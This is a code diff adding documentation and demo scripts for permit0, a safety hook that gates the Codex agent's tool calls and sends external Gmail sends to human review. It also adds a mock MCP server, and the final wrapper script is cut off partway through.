+Add the hook to your Codex config and trust it once via the TUI.
+
+1. Append this block to `~/.codex/config.toml`:
+
+   ```toml
+   [features]
+   hooks = true
+
+   [[hooks.PreToolUse]]
+   matcher = ".*"
+
+   [[hooks.PreToolUse.hooks]]
+   type = "command"
+   command = "/absolute/path/to/permit0/target/release/permit0 hook --client codex --packs-dir /absolute/path/to/permit0/packs --unknown defer"
+   timeout = 30
+   statusMessage = "permit0 safety check"
+   ```
+
+   See [`examples/config.toml.example`](./examples/config.toml.example) for
+   a paste-ready snippet. The `hooks.json` alternative form is in
+   [`examples/hooks.json.example`](./examples/hooks.json.example).
+
+2. Launch Codex once interactively:
+
+   ```bash
+   codex
+   ```
+
+   You'll see "1 hook needs review before it can run. Open /hooks to
+   review it." at the top of the TUI. Type `/hooks`, find the permit0
+   entry, mark it trusted (single-letter shortcut shown in the footer).
+   Exit Codex.
+
+3. From now on every `codex` and `codex exec` session fires permit0 on
+   every tool call. Re-trust is required if you edit the hook command
+   (Codex tracks a content hash).
+
+## Setup (unattended — macOS auto-trust)
+
+For CI, scripts, or anywhere you can't open the TUI: install the hook
+via macOS managed preferences. Codex treats these as MDM-sourced =
+always trusted, no review needed.
+
+```bash
+bash integrations/permit0-codex/examples/install-managed-prefs.sh
+```
+
+The script reads the same TOML config layered into macOS user defaults
+under `com.openai.codex/requirements_toml_base64`. To uninstall:
+
+```bash
+defaults delete com.openai.codex requirements_toml_base64
+```
+
+This is the path the live-demo launcher in `dev-test-rig/codex-demo`
+uses internally.
+
+## What permit0 actually intercepts
+
+| Tool type | Gated? | `tool_name` permit0 sees |
+|---|---|---|
+| Bash / shell commands (simple path) | ✅ | `"Bash"` |
+| File edits via `apply_patch` | ✅ | `"apply_patch"` |
+| MCP server tool calls | ✅ | `"mcp__<server>__<tool>"` |
+| `unified_exec` (Codex's newer shell mechanism) | ❌ (Codex limitation) | — |
+| `WebSearch` | ❌ (Codex limitation) | — |
+| Image generation | ❌ (Codex limitation) | — |
+
+The Codex docs at <https://developers.openai.com/codex/hooks> explicitly
+list these limitations as "still a guardrail rather than a complete
+enforcement boundary." permit0 inherits them.
+
+## Behavior under permit0's verdict tiers
+
+| permit0 verdict | What permit0 emits to Codex | What Codex does |
+|---|---|---|
+| `Allow` / `Defer` | Zero stdout bytes | Tool runs |
+| `Deny` | `permissionDecision: "deny"` envelope with reason | Tool blocked, model sees the reason |
+| `HumanInTheLoop` (Medium/High tier) | `permissionDecision: "deny"` envelope with `" — requires human review"` marker appended to the reason | Tool blocked; the marker tells users this was a HITL action under Claude Code, not a hard Critical block |
+| Internal error in permit0 | `permissionDecision: "deny"` envelope with `"permit0 internal error: <msg>"` | Tool blocked (fail-closed) |
+
+Codex `PreToolUse` does **not** support `permissionDecision: "allow"` or
+`"ask"`; both are explicitly rejected. permit0 never emits either.
+
+## Verifying end-to-end
+
+The full end-to-end test transcript is in
+[`../../docs/plans/codex-integration/06-real-codex-testing.md`](../../docs/plans/codex-integration/06-real-codex-testing.md).
+The condensed version:
+
+- **Synthetic smoke (CI-safe, no Codex install needed):**
+
+  ```bash
+  ./scripts/test-codex-hook.sh
+  ```
+
+  9 canned scenarios pass against `target/release/permit0` in ~1 second.
+
+- **Live Codex demo:**
+
+  ```bash
+  bash integrations/permit0-codex/dev-test-rig/codex-demo
+  ```
+
+  Opens an interactive Codex session with:
+  - The hook auto-installed (managed prefs, no `/hooks` review needed)
+  - A mock `gmail_send` MCP server wired in so you can exercise permit0's
+    real Gmail pack without setting up Gmail credentials
+  - An optional `watch` script (in the same dir) for a second terminal
+    that tails events in real time
+
+  See [`dev-test-rig/README.md`](./dev-test-rig/README.md) for the
+  prompts to type and what to expect.
+
+## Files in this directory
+
+```
+README.md                          ← you are here
+examples/
+  config.toml.example              copy-paste TOML for ~/.codex/config.toml
+  hooks.json.example               equivalent JSON form for ~/.codex/hooks.json
+  install-managed-prefs.sh         macOS auto-trust installer
+dev-test-rig/
+  README.md                        demo prompts and forensics tour
+  codex-demo                       interactive demo launcher
+  watch                            live event-log viewer
+  cleanup                          removes managed-prefs hook
+  wrap-permit0.sh                  instrumented hook wrapper
+  mock-gmail-mcp.py                mock MCP server exposing gmail_send
+  _watch_render.py                 internal: pretty-prints events.log rows
+```
+
+## Where the code lives
+
+- Hook adapter: [`crates/permit0-cli/src/cmd/hook.rs`](../../crates/permit0-cli/src/cmd/hook.rs)
+  — `ClientKind::Codex`, `OutputFormat::Codex`, `hook_output_to_codex`, fail-closed wrapper
+- Unit tests: in `#[cfg(test)] mod tests` inside the same file
+- Integration tests: [`crates/permit0-cli/tests/cli_tests.rs`](../../crates/permit0-cli/tests/cli_tests.rs)
+- Smoke test: [`scripts/test-codex-hook.sh`](../../scripts/test-codex-hook.sh)
+
+## Design docs
+
+- [`docs/plans/codex-integration/`](../../docs/plans/codex-integration/) — overview, protocol, implementation, configuration, testing, limitations, and the verified end-to-end transcript
+- [`docs/plan-reviews/codex-integration/`](../../docs/plan-reviews/codex-integration/) — pre-implementation reviews of the plan
+- [`docs/code-reviews/codex-integration/`](../../docs/code-reviews/codex-integration/) — post-implementation code reviews

--- a/integrations/permit0-codex/dev-test-rig/README.md
+++ b/integrations/permit0-codex/dev-test-rig/README.md
@@ -1,0 +1,162 @@
+# permit0 + Codex live demo rig
+
+End-to-end exercise of the permit0 / Codex integration against a real
+Codex install on macOS. Useful for:
+
+- Smoke-testing the integration after permit0 changes
+- Showing the integration working without setting up real Gmail/MCP creds
+- Reproducing the test transcript in
+  [`../../../docs/plans/codex-integration/06-real-codex-testing.md`](../../../docs/plans/codex-integration/06-real-codex-testing.md)
+
+This rig is **not for end users** — for production setup see
+[`../README.md`](../README.md). These scripts modify macOS user defaults
+under `com.openai.codex/requirements_toml_base64` (recoverable with the
+`cleanup` script in this dir).
+
+## Two-terminal demo
+
+**Terminal 1 — launch:**
+
+```bash
+bash integrations/permit0-codex/dev-test-rig/codex-demo
+```
+
+A banner appears, then Codex launches into its TUI. The hook is
+installed automatically (managed prefs, no `/hooks` review needed) and a
+mock-gmail MCP server is wired into the isolated `CODEX_HOME` at
+`/tmp/permit0-codex-test/` (override with `PERMIT0_TRACE_DIR=...`).
+
+**Terminal 2 — watch:**
+
+```bash
+bash integrations/permit0-codex/dev-test-rig/watch
+```
+
+Tails the event log and prints a colored row per hook fire:
+green `ALLOW/DEFER`, red `DENY`.
+
+## Prompts to try inside Codex
+
+### 1. Permit0 waves a benign Bash command through
+
+```
+Run 'ls -la' and tell me what files you see
+```
+
+Codex's Bash tool fires → permit0 has no Bash pack → falls through
+`--unknown defer` → empty stdout → command runs.
+
+The `watch` terminal will show a green `ALLOW/DEFER` row with
+`tool=Bash`.
+
+### 2. Permit0 blocks an external Gmail send
+
+```
+Use the gmail_send tool to send a quick note to alice@external-customer.com
+with subject "Meeting confirmation" and body "Hi Alice, confirming our 2pm
+meeting tomorrow."
+```
+
+Codex packages this as `tool_name = "mcp__mock_gmail__gmail_send"`. permit0:
+
+1. Strips `mcp__mock_gmail__` → `gmail_send`
+2. Gmail pack normalizer matches → `action=email.send, channel=gmail`
+3. Risk rules detect external recipient → Medium tier → `HumanInTheLoop`
+4. Codex emitter maps HITL → deny envelope with `" — requires human review"` marker
+
+Codex receives the deny, the mock MCP server is **never called for
+`tools/call`**, and the model says something like *"the email send was
+blocked for human review by the tool's permission hook"*.
+
+The `watch` terminal will show a red `DENY` row with the MCP tool name.
+
+### 3. Compare shadow mode
+
+Exit Codex (Ctrl-C twice), then:
+
+```bash
+bash integrations/permit0-codex/dev-test-rig/codex-demo --shadow
+```
+
+Same setup, but `PERMIT0_SHADOW=1` propagates to the wrapper and permit0
+runs in observe-only mode. Re-run the email prompt:
+
+- permit0 logs `[permit0 shadow] WOULD ASK: email.send (gmail) — risk 43/100 Medium` to stderr
+- Returns empty stdout to Codex (no objection)
+- Codex proceeds to call the mock MCP, which returns its fake "Pretended to send..." response
+
+This is the "observe before enforce" rollout pattern. The same hook
+binary, just different flags.
+
+## Forensics — what each file shows you
+
+After a session, every hook fire writes a per-invocation directory:
+
+```bash
+ls /tmp/permit0-codex-test/inv-*/
+```
+
+Each contains:
+
+| File | Contents |
+|---|---|
+| `stdin.json` | Exact bytes Codex sent to permit0 (the PreToolUse stdin schema) |
+| `stdout` | Exact bytes permit0 returned to Codex (empty or deny envelope) |
+| `stderr` | permit0's stderr — shadow logs, error breadcrumbs |
+| `env` | Snapshot of env vars + paths at invocation time |
+
+Plus repo-wide trace files:
+
+| File | Contents |
+|---|---|
+| `events.log` | JSONL: one structured row per hook fire (used by `watch`) |
+| `mock-mcp.log` | JSONL: every JSON-RPC frame the mock MCP server saw/sent. Notably the absence of `tools/call` entries proves permit0 stopped Codex before the MCP server was asked to actually act. |
+
+## When you're done
+
+```bash
+bash integrations/permit0-codex/dev-test-rig/cleanup
+```
+
+Removes the macOS managed-prefs hook. Your normal `codex` sessions stop
+firing permit0. The demo scripts stay in the repo for next time.
+
+To wipe trace state:
+
+```bash
+rm -rf /tmp/permit0-codex-test
+```
+
+## File-by-file
+
+| Script | Purpose |
+|---|---|
+| `codex-demo` | Installs the managed-prefs hook + isolated `CODEX_HOME` with mock-gmail MCP, then launches Codex |
+| `watch` | Tails `events.log` with colored rows |
+| `cleanup` | Removes managed-prefs hook |
+| `wrap-permit0.sh` | Codex's hook command — invokes permit0 and captures per-invocation traces |
+| `mock-gmail-mcp.py` | 180-line stdio MCP server exposing a fake `gmail_send` tool |
+| `_watch_render.py` | Pretty-prints `events.log` rows (used by `watch`) |
+
+## Troubleshooting
+
+**`events.log` stays empty after a Codex session.**
+Re-run `codex-demo` (it always re-installs the hook). If still empty,
+verify the hook is installed:
+
+```bash
+defaults read com.openai.codex requirements_toml_base64 | base64 -d
+```
+
+Should print the TOML config.
+
+**Codex prompts to trust the project directory.**
+That's Codex's directory-trust prompt (separate from hook trust). Answer
+yes or skip via `--skip-git-repo-check` — `codex-demo` already passes
+that to launches.
+
+**MCP tool call shows "user cancelled" instead of "blocked by hook".**
+A Codex quirk when `approval_policy = "never"` is combined with
+`codex exec` — Codex sometimes refuses MCP calls without surfacing the
+approval prompt. Doesn't affect the interactive TUI that `codex-demo`
+opens. If you hit it, retype the prompt in the TUI.

--- a/integrations/permit0-codex/dev-test-rig/_watch_render.py
+++ b/integrations/permit0-codex/dev-test-rig/_watch_render.py
@@ -1,0 +1,44 @@
+"""
+Renderer for the `watch` script. Reads events.log lines on stdin and
+prints one colored row per invocation. Kept in its own file so the
+parent shell script doesn't have to escape Python quoting.
+"""
+
+import json
+import os
+import sys
+
+
+def main() -> None:
+    use_color = sys.stdout.isatty() and not os.environ.get("NO_COLOR")
+
+    def c(code: str, text: str) -> str:
+        return f"\x1b[{code}m{text}\x1b[0m" if use_color else text
+
+    styles = {
+        "EMPTY_STDOUT": ("32", "ALLOW/DEFER"),
+        "deny": ("31", "DENY       "),
+        "<missing>": ("33", "<missing>  "),
+    }
+
+    for line in sys.stdin:
+        line = line.strip()
+        if not line:
+            continue
+        try:
+            event = json.loads(line)
+        except json.JSONDecodeError:
+            continue
+        ts = event.get("ts", "?")
+        tool = event.get("tool_name", "?")
+        dec = event.get("decision", "?")
+        dur = event.get("duration_ms", "?")
+        color, label = styles.get(dec, ("0", str(dec).ljust(11)))
+        print(
+            f"  {c('90', ts)}  {c(color, label)}  tool={c('36', tool)}  dur={dur}ms",
+            flush=True,
+        )
+
+
+if __name__ == "__main__":
+    main()

--- a/integrations/permit0-codex/dev-test-rig/cleanup
+++ b/integrations/permit0-codex/dev-test-rig/cleanup
@@ -1,0 +1,101 @@
+#!/usr/bin/env bash
+#
+# cleanup — undo the permit0+Codex demo setup.
+#
+# Removes the macOS managed-prefs hook so Codex stops firing permit0
+# on tool calls. Refuses to delete a managed-prefs value that wasn't
+# installed by permit0 (e.g. an enterprise MDM policy) unless --force
+# is passed.
+#
+# Usage:
+#   cleanup                  # delete only if stamped by permit0
+#   cleanup --force          # delete any value (no stamp check)
+#   cleanup --help           # show this help
+#
+# After cleanup, normal `codex` sessions no longer fire permit0.
+#
+# To restore a prior MDM/managed value that you backed up via the
+# installer, use:
+#   integrations/permit0-codex/examples/install-managed-prefs.sh --uninstall
+
+set -uo pipefail
+
+DEFAULTS_DOMAIN="com.openai.codex"
+DEFAULTS_KEY="requirements_toml_base64"
+STAMP="# permit0-managed: installed by integrations/permit0-codex"
+BACKUP_DIR="$HOME/.permit0"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+INSTALLER="$SCRIPT_DIR/../examples/install-managed-prefs.sh"
+TRACE_DIR="${PERMIT0_TRACE_DIR:-/tmp/permit0-codex-test}"
+
+print_help() {
+    cat <<'EOF'
+cleanup — remove the permit0+Codex managed-prefs hook.
+
+USAGE:
+  cleanup                  delete only if the value bears permit0's stamp
+  cleanup --force          delete any value (no stamp check)
+  cleanup --help           this message
+
+ALSO SEE:
+  install-managed-prefs.sh --uninstall
+    Same delete behavior plus auto-restores the most recent backup at
+    ~/.permit0/managed-prefs-backup-<TIMESTAMP>.toml — use this if you
+    overwrote an existing MDM value with --force.
+EOF
+}
+
+FORCE=0
+for arg in "$@"; do
+    case "$arg" in
+        --force)    FORCE=1 ;;
+        -h|--help)  print_help; exit 0 ;;
+        *)
+            echo "error: unknown flag: $arg" >&2
+            print_help
+            exit 2
+            ;;
+    esac
+done
+
+echo "Removing permit0 hook from macOS managed preferences..."
+
+if ! defaults read "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY" >/dev/null 2>&1; then
+    echo "  (already absent)"
+    exit 0
+fi
+
+EXISTING=$(defaults read "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY" | base64 -d)
+
+if ! grep -qF "$STAMP" <<<"$EXISTING"; then
+    if [[ "$FORCE" != "1" ]]; then
+        echo "error: managed-prefs value present but NOT stamped by permit0." >&2
+        echo "       Refusing to delete — this may be your enterprise MDM's policy." >&2
+        echo "       Re-run with --force to remove it anyway." >&2
+        echo "       First 5 lines:" >&2
+        printf '%s\n' "$EXISTING" | head -5 | sed 's/^/         | /' >&2
+        exit 2
+    fi
+    echo "WARNING: deleting unstamped value (--force given)."
+fi
+
+defaults delete "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY"
+echo "  ✓ removed"
+
+# Mention restorable backups so the user has one canonical recovery path.
+if compgen -G "$BACKUP_DIR/managed-prefs-backup-*.toml" >/dev/null 2>&1; then
+    echo
+    echo "Found backup(s) at $BACKUP_DIR/managed-prefs-backup-*.toml"
+    echo "To restore the most recent one:"
+    echo "  bash $INSTALLER --uninstall"
+fi
+
+cat <<EOF
+
+permit0 hook detached from Codex. Normal codex sessions will no longer
+fire permit0. Demo scripts stay in place — re-run codex-demo any time.
+
+Trace state still on disk under $TRACE_DIR (events.log, inv-*/,
+mock-mcp.log). Remove with:
+  rm -rf "$TRACE_DIR"
+EOF

--- a/integrations/permit0-codex/dev-test-rig/codex-demo
+++ b/integrations/permit0-codex/dev-test-rig/codex-demo
@@ -1,0 +1,172 @@
+#!/usr/bin/env bash
+#
+# codex-demo — launch Codex with everything wired up for the permit0 demo.
+#
+# Sets CODEX_HOME to a fresh trace dir (default /tmp/permit0-codex-test/),
+# wires the mock-gmail MCP server, installs the macOS managed-prefs hook
+# (auto-trusted, no /hooks review needed), and launches Codex
+# interactively. Type prompts as you would in any normal Codex session.
+#
+# By default the hook runs in ENFORCEMENT mode — permit0 actually blocks
+# risky tool calls. Pass --shadow to flip to observe-only mode:
+#
+#     bash codex-demo            # enforces
+#     bash codex-demo --shadow   # observes only
+#
+# Customize the trace dir with PERMIT0_TRACE_DIR=/path/to/dir if you
+# want to keep traces somewhere other than /tmp/permit0-codex-test.
+
+set -euo pipefail
+
+# ── Locate ourselves and the repo root ──────────────────────────────
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+
+# Resolve the codex binary: $CODEX env override > PATH > macOS app bundle.
+# PATH comes before the bundle path because it's portable beyond macOS;
+# on macOS both typically resolve to the same binary anyway.
+CODEX="${CODEX:-}"
+if [[ -z "$CODEX" ]]; then
+    if command -v codex >/dev/null 2>&1; then
+        CODEX="$(command -v codex)"
+    elif [[ -x /Applications/Codex.app/Contents/Resources/codex ]]; then
+        CODEX=/Applications/Codex.app/Contents/Resources/codex
+    fi
+fi
+
+PERMIT0="$REPO_ROOT/target/release/permit0"
+TRACE_DIR="${PERMIT0_TRACE_DIR:-/tmp/permit0-codex-test}"
+
+# Optional --shadow flag.
+SHADOW=0
+for arg in "$@"; do
+    if [[ "$arg" == "--shadow" ]]; then
+        SHADOW=1
+    fi
+done
+
+# ── Sanity checks ───────────────────────────────────────────────────
+if [[ -z "$CODEX" || ! -x "$CODEX" ]]; then
+    echo "error: Codex binary not found." >&2
+    echo "  Tried: \$CODEX env var, \`command -v codex\` on PATH," >&2
+    echo "         and /Applications/Codex.app/Contents/Resources/codex" >&2
+    echo "  Fix:   set CODEX=/path/to/codex, or install Codex" >&2
+    echo "         (npm install -g @openai/codex, or the desktop app)" >&2
+    exit 2
+fi
+if [[ ! -x "$PERMIT0" ]]; then
+    echo "error: permit0 binary missing at $PERMIT0" >&2
+    echo "       build it first: cd $REPO_ROOT && cargo build --release" >&2
+    exit 2
+fi
+for f in wrap-permit0.sh mock-gmail-mcp.py watch _watch_render.py cleanup; do
+    if [[ ! -f "$SCRIPT_DIR/$f" ]]; then
+        echo "error: dev-test-rig file missing: $SCRIPT_DIR/$f" >&2
+        exit 2
+    fi
+done
+
+# ── Install the managed-prefs hook (auto-trusted) ───────────────────
+# Demo-flavored variant: the hook command points at our instrumented
+# wrap-permit0.sh wrapper (which captures forensics into $TRACE_DIR)
+# rather than calling the permit0 binary directly. We use the same
+# safety machinery as the production installer — stamp, detect, backup —
+# but inline-write the body so we can substitute the wrapper path.
+STAMP="# permit0-managed: installed by integrations/permit0-codex"
+DEMO_TOML="$STAMP
+[features]
+hooks = true
+
+[hooks]
+managed_dir = \"$SCRIPT_DIR\"
+windows_managed_dir = \"$SCRIPT_DIR\"
+
+[[hooks.PreToolUse]]
+matcher = \".*\"
+
+[[hooks.PreToolUse.hooks]]
+type = \"command\"
+command = \"$SCRIPT_DIR/wrap-permit0.sh\"
+timeout = 30
+statusMessage = \"permit0 safety check\"
+"
+
+# Refuse to clobber a non-permit0 managed-prefs value (e.g. enterprise
+# MDM) — same safety model as install-managed-prefs.sh.
+if EXISTING=$(defaults read com.openai.codex requirements_toml_base64 2>/dev/null | base64 -d); then
+    if ! grep -qF "$STAMP" <<<"$EXISTING"; then
+        echo "error: a NON-permit0 managed-prefs value is set under" >&2
+        echo "       com.openai.codex/requirements_toml_base64." >&2
+        echo "       Refusing to overwrite it. If this is safe to replace, run:" >&2
+        echo "         bash $SCRIPT_DIR/../examples/install-managed-prefs.sh --force" >&2
+        echo "       (which backs up the prior value) and then re-run this demo." >&2
+        exit 2
+    fi
+    # Stamped — re-installing demo over previous demo. Backup just in case.
+    mkdir -p "$HOME/.permit0"
+    TS="$(date +%Y%m%d-%H%M%S)"
+    printf '%s' "$EXISTING" > "$HOME/.permit0/managed-prefs-backup-$TS.toml"
+fi
+defaults write com.openai.codex requirements_toml_base64 \
+    -string "$(echo -n "$DEMO_TOML" | base64)"
+
+# ── Build CODEX_HOME config: mock-gmail MCP wired in ────────────────
+mkdir -p "$TRACE_DIR"
+cat > "$TRACE_DIR/config.toml" <<EOF
+model = "gpt-5.5"
+model_reasoning_effort = "medium"
+approval_policy = "never"
+sandbox_mode = "workspace-write"
+
+[mcp_servers.mock-gmail]
+command = "$SCRIPT_DIR/mock-gmail-mcp.py"
+EOF
+
+# Link auth.json and the models_cache from the user's real Codex home
+# so login carries over without copying secrets.
+ln -sf ~/.codex/auth.json "$TRACE_DIR/auth.json" 2>/dev/null || true
+ln -sf ~/.codex/models_cache.json "$TRACE_DIR/models_cache.json" 2>/dev/null || true
+
+# Reset trace so this session starts fresh.
+find "$TRACE_DIR" -maxdepth 1 -name 'inv-*' -exec rm -rf {} + 2>/dev/null
+: > "$TRACE_DIR/events.log"
+: > "$TRACE_DIR/mock-mcp.log"
+
+# ── Banner ──────────────────────────────────────────────────────────
+MODE_BANNER="ENFORCE  ← permit0 will block risky tool calls"
+SHADOW_EXPORT=""
+if [[ "$SHADOW" == "1" ]]; then
+    MODE_BANNER="SHADOW   ← permit0 watches but never blocks"
+    SHADOW_EXPORT="PERMIT0_SHADOW=1"
+fi
+
+cat <<EOF
+
+╔══════════════════════════════════════════════════════════════════╗
+║              permit0 + Codex live demo (Codex 0.130)             ║
+╠══════════════════════════════════════════════════════════════════╣
+║                                                                  ║
+║  Mode:        $MODE_BANNER  ║
+║  Repo root:   $REPO_ROOT
+║  Trace dir:   $TRACE_DIR
+║  Mock MCP:    mock-gmail (exposes a fake gmail_send tool)        ║
+║                                                                  ║
+║  Try in a SECOND terminal:                                       ║
+║    bash $SCRIPT_DIR/watch
+║  …to watch permit0 fire in real time as Codex uses tools.        ║
+║                                                                  ║
+║  Try these prompts inside Codex:                                 ║
+║    • Run 'ls -la' and tell me what files you see                 ║
+║    • Use the gmail_send tool to email                            ║
+║      alice@external-customer.com about tomorrow's 2pm meeting    ║
+║    • Run 'date' three times and report the output                ║
+║                                                                  ║
+║  When done, exit Codex (Ctrl-C twice) then run:                  ║
+║    bash $SCRIPT_DIR/cleanup
+║                                                                  ║
+╚══════════════════════════════════════════════════════════════════╝
+
+EOF
+
+# ── Launch Codex interactively ──────────────────────────────────────
+exec env CODEX_HOME="$TRACE_DIR" PERMIT0_TRACE_DIR="$TRACE_DIR" $SHADOW_EXPORT "$CODEX"

--- a/integrations/permit0-codex/dev-test-rig/mock-gmail-mcp.py
+++ b/integrations/permit0-codex/dev-test-rig/mock-gmail-mcp.py
@@ -1,0 +1,162 @@
+#!/usr/bin/env python3
+"""
+Mock Gmail MCP server — exposes a `gmail_send` tool over stdio JSON-RPC.
+
+NEVER actually sends mail. Returns a synthetic success response. Sole
+purpose is to give Codex a tool named `gmail_send` so permit0's Gmail
+pack normalizer matches and risk rules fire (recipient_scope,
+extract_domain, etc.) during the live-codex demo.
+
+Wire spec: MCP 2024-11-05 (close enough — Codex's MCP client is
+permissive about minor revs).
+
+Trace state goes under `PERMIT0_TRACE_DIR` (default
+`/tmp/permit0-codex-test/`) so nothing lands in the repo.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import sys
+import time
+from pathlib import Path
+from typing import Any
+
+TRACE_DIR = Path(os.environ.get("PERMIT0_TRACE_DIR", "/tmp/permit0-codex-test"))
+LOG_PATH = TRACE_DIR / "mock-mcp.log"
+PROTOCOL_VERSION = "2024-11-05"
+SERVER_NAME = "mock-gmail"
+SERVER_VERSION = "0.0.1"
+
+TOOLS: list[dict[str, Any]] = [
+    {
+        "name": "gmail_send",
+        "description": (
+            "Send an email through the user's Gmail account. NEVER returns "
+            "a real send confirmation — this is a mock for testing the "
+            "permit0 hook integration."
+        ),
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "to": {"type": "string", "description": "Primary recipient email address."},
+                "cc": {"type": "string", "description": "Cc recipients (comma-separated)."},
+                "bcc": {"type": "string", "description": "Bcc recipients (comma-separated)."},
+                "subject": {"type": "string", "description": "Email subject line."},
+                "body": {"type": "string", "description": "Email body (plain text)."},
+            },
+            "required": ["to", "subject", "body"],
+        },
+    },
+]
+
+
+def log(direction: str, payload: Any) -> None:
+    try:
+        TRACE_DIR.mkdir(parents=True, exist_ok=True)
+        with LOG_PATH.open("a") as f:
+            f.write(
+                json.dumps(
+                    {
+                        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
+                        "dir": direction,
+                        "payload": payload,
+                    }
+                )
+                + "\n"
+            )
+    except Exception:
+        pass
+
+
+def send(payload: dict[str, Any]) -> None:
+    line = json.dumps(payload)
+    log("send", payload)
+    sys.stdout.write(line + "\n")
+    sys.stdout.flush()
+
+
+def handle_request(req: dict[str, Any]) -> dict[str, Any] | None:
+    method = req.get("method")
+    req_id = req.get("id")
+
+    # Notifications (no `id` field) get no response.
+    if req_id is None:
+        log("notification_in", req)
+        return None
+
+    if method == "initialize":
+        return {
+            "jsonrpc": "2.0",
+            "id": req_id,
+            "result": {
+                "protocolVersion": PROTOCOL_VERSION,
+                "capabilities": {"tools": {}},
+                "serverInfo": {"name": SERVER_NAME, "version": SERVER_VERSION},
+            },
+        }
+
+    if method == "tools/list":
+        return {
+            "jsonrpc": "2.0",
+            "id": req_id,
+            "result": {"tools": TOOLS},
+        }
+
+    if method == "tools/call":
+        params = req.get("params") or {}
+        name = params.get("name")
+        args = params.get("arguments") or {}
+        if name == "gmail_send":
+            to = args.get("to", "<unknown>")
+            subject = args.get("subject", "<no subject>")
+            return {
+                "jsonrpc": "2.0",
+                "id": req_id,
+                "result": {
+                    "content": [
+                        {
+                            "type": "text",
+                            "text": (
+                                f"[mock-gmail] Pretended to send email to {to!r} "
+                                f"with subject {subject!r}. No real mail was sent."
+                            ),
+                        }
+                    ]
+                },
+            }
+        return {
+            "jsonrpc": "2.0",
+            "id": req_id,
+            "error": {"code": -32601, "message": f"unknown tool: {name!r}"},
+        }
+
+    return {
+        "jsonrpc": "2.0",
+        "id": req_id,
+        "error": {"code": -32601, "message": f"method not implemented: {method!r}"},
+    }
+
+
+def main() -> int:
+    log("startup", {"pid": os.getpid()})
+    for line in sys.stdin:
+        line = line.strip()
+        if not line:
+            continue
+        try:
+            req = json.loads(line)
+        except json.JSONDecodeError as e:
+            log("recv_bad_json", {"err": str(e), "raw": line[:200]})
+            continue
+        log("recv", req)
+        resp = handle_request(req)
+        if resp is not None:
+            send(resp)
+    log("shutdown", {})
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/integrations/permit0-codex/dev-test-rig/watch
+++ b/integrations/permit0-codex/dev-test-rig/watch
@@ -1,0 +1,31 @@
+#!/usr/bin/env bash
+#
+# watch — live, human-readable view of permit0 hook fires.
+#
+# Tails $TRACE_DIR/events.log and prints one colored row per
+# invocation. Run this in a second terminal while Codex is open in
+# the first. Ctrl-C to stop.
+
+set -uo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+TRACE_DIR="${PERMIT0_TRACE_DIR:-/tmp/permit0-codex-test}"
+RENDER="$SCRIPT_DIR/_watch_render.py"
+
+if [[ ! -f "$RENDER" ]]; then
+    echo "watch: missing renderer at $RENDER" >&2
+    exit 2
+fi
+
+mkdir -p "$TRACE_DIR"
+touch "$TRACE_DIR/events.log"
+
+echo "Watching $TRACE_DIR/events.log — Ctrl-C to stop"
+if [[ -s "$TRACE_DIR/events.log" ]]; then
+    echo "── existing fires ──"
+else
+    echo "(no fires yet — open Codex in another terminal and use a tool)"
+fi
+echo
+
+exec tail -F -n +1 "$TRACE_DIR/events.log" 2>/dev/null | python3 -u "$RENDER"

--- a/integrations/permit0-codex/dev-test-rig/wrap-permit0.sh
+++ b/integrations/permit0-codex/dev-test-rig/wrap-permit0.sh
@@ -1,0 +1,134 @@
+#!/usr/bin/env bash
+#
+# wrap-permit0.sh — instrumented permit0 hook wrapper for Codex.
+#
+# Codex's `[hooks.PreToolUse.hooks].command` points at this script. On
+# every PreToolUse fire it:
+#   1. Generates a unique invocation id (`inv-<ts>-<pid>`).
+#   2. Captures Codex's full stdin to `$TRACE_DIR/inv-<id>/stdin.json`.
+#   3. Invokes the permit0 binary with the Codex client kind and the
+#      repo's pack directory.
+#   4. Captures permit0's stdout (the deny envelope, or 0 bytes) to
+#      `inv-<id>/stdout` and stderr to `inv-<id>/stderr`.
+#   5. Appends one structured JSONL row per invocation to
+#      `$TRACE_DIR/events.log`.
+#   6. Forwards permit0's stdout + stderr to Codex with the original
+#      exit code.
+#
+# Default mode is enforcement (permit0 actually blocks risky tool calls).
+# Set PERMIT0_SHADOW=1 in the environment to flip to observe-only mode.
+#
+# All ephemeral trace state goes under TRACE_DIR (=/tmp/permit0-codex-test
+# by default) so it is never committed to the repo.
+
+set -uo pipefail
+
+# ── Locate ourselves and the repo root ─────────────────────────────
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+# dev-test-rig/ → permit0-codex/ → integrations/ → repo root
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+
+TRACE_DIR="${PERMIT0_TRACE_DIR:-/tmp/permit0-codex-test}"
+PERMIT0="$REPO_ROOT/target/release/permit0"
+PACKS_DIR="$REPO_ROOT/packs"
+
+if [[ ! -x "$PERMIT0" ]]; then
+    echo "wrap-permit0: $PERMIT0 missing or not executable — run \`cargo build --release\` first" >&2
+    exit 2
+fi
+
+HOOK_ARGS=(hook --client codex --packs-dir "$PACKS_DIR" --unknown defer)
+if [[ -n "${PERMIT0_SHADOW:-}" && "${PERMIT0_SHADOW}" != "0" ]]; then
+    HOOK_ARGS+=(--shadow)
+fi
+
+mkdir -p "$TRACE_DIR"
+
+INV_ID="$(python3 -c 'import time; print(f"{int(time.time()*1000):013d}")')-$$"
+INV_DIR="$TRACE_DIR/inv-$INV_ID"
+mkdir -p "$INV_DIR"
+
+{
+    echo "PPID=$PPID"
+    echo "PID=$$"
+    echo "CODEX_THREAD_ID=${CODEX_THREAD_ID:-}"
+    echo "CODEX_HOME=${CODEX_HOME:-}"
+    echo "PERMIT0_SHADOW=${PERMIT0_SHADOW:-}"
+    echo "SCRIPT_DIR=$SCRIPT_DIR"
+    echo "REPO_ROOT=$REPO_ROOT"
+    echo "TRACE_DIR=$TRACE_DIR"
+    echo "CWD=$(pwd)"
